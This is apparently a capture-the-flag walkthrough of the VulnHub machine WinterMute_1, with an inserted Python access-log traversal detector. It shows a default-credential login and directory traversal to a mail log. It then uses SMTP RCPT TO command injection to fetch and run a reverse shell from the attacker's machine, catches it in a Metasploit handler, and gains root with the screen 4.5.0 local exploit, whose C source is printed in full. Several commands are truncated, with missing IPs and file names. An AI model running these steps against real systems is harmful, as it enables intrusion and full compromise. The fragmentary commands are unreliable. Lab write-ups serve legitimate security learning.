WinterMute_1 (VULHUB)


root@kali:~# netdiscover -i eth0

root@kali:~# nmap -p- -A

Open ports: 25, 80, 3000

In the browser:

username : admin
password : admin

And we are in.

On clicking the Flows option, we were redirected to the following page:

Here we observed that a few directories were listed (as shown in the screenshot above), so we thought of appending them to our URL OR

We tried accessing, however no success. Then we browsed the URL and got the page below.

Click on Submit Query and we are redirected to the following page.

From the above screenshot we can see a few log files (as highlighted). In our experience, this could be an indication of directory traversal, where we can execute writable files in the browser. Hence let’s try to append ../../../log/mail to the URL in the browser as follows:
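
Seen from the server side, the ../../../log/mail request is easy to find in web access logs if each query parameter is resolved against the application directory rather than searched for the literal string "../". The following is an added example, not part of the original walkthrough; the base directory, the parameter name "page" and the log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

BASE = "/var/www/html/app"  # assumption: directory the include parameter is joined onto
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed access-log lines (combined format). The addresses, paths and
# the parameter name "page" are made up for this example.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /app/index.php?page=about HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /app/index.php?page=../../../log/mail HTTP/1.1" 200 9481',
    '192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /app/index.php?page=%252e%252e%2f%252e%252e%2f%252e%252e%2flog%2fmail HTTP/1.1" 200 9481',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /app/index.php?page=docs/../about HTTP/1.1" 200 512',
]

def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded dots and slashes are exposed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def resolve(param, base=BASE):
    """Path the server would open if it joined the parameter onto base."""
    return posixpath.normpath(posixpath.join(base, fully_unquote(param)))

def escapes_base(param, base=BASE):
    """True when the resolved path is outside base (relative or absolute input)."""
    target = resolve(param, base)
    return target != base and not target.startswith(base + "/")

def traversal_hits(lines, base=BASE):
    """Return (client, parameter, resolved path, status) for escaping requests."""
    hits = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if escapes_base(value, base):
                hits.append((client, name, resolve(value, base), int(status)))
    return hits

if __name__ == "__main__":
    print(*traversal_hits(SAMPLE), sep="\n")
```

The same escapes_base check, applied before the file is opened, is what keeps the parameter inside the application directory in the first place.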

Now let’s try to enumerate further and connect to the SMTP (25) port

root@kali:~# telnet 25


RCPT TO: shell.elf

root@kali:~# python -m SimpleHTTPServer 80

As we succeeded in receiving the response of OS commands in the email log files, there is a possibility that, following the same method, we may also get Meterpreter access to the victim machine.

Hence, as seen in the below screenshot, we will pass the commands in the RCPT command as follows:

1. Navigate to the /tmp directory and download the shell.elf file from the Kali machine

2. Modify the permissions of the shell.elf file

3. Execute our reverse shell (shell.elf) file




Now, in parallel, open the Metasploit console and perform the following:

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

meterpreter > sysinfo

meterpreter > shell

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@straylight:/$ find / -perm -4000 2>/dev/null

Now, on another terminal:

root@kali:~# searchsploit screen 4.5.0

root@kali:~# cat /usr/share/exploitdb/exploits/linux/local/

root@kali:~# gedit libhax.c

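#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
/* The constructor attribute makes dropshell() run when the library is loaded */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    printf("[+] done!\n");
}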

root@kali:~# gedit rootshell.c

#include <unistd.h>
int main(void){
    execvp("/bin/sh", (char *[]){"/bin/sh", NULL});
}

Now go back to the Meterpreter session and upload the exploit files from the Kali machine to the /tmp directory of the target (victim) machine.

meterpreter > upload libhax.c /tmp

meterpreter > upload rootshell.c /tmp

meterpreter > shell

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@straylight:/$ gcc -fPIC -shared -ldl -o /tmp/ /tmp/libhax.c

www-data@straylight:/$ gcc -o /tmp/rootshell /tmp/rootshell.c

www-data@straylight:/$ cd /etc
www-data@straylight:/$ umask 000
www-data@straylight:/$ screen -D -m -L echo -ne "\x0a/tmp/"
www-data@straylight:/$ screen -ls

www-data@straylight:/$ /tmp/rootshell

# cd /root

Let’s see what files it contains:

# ls

# cat flag.txt

# cat note.txt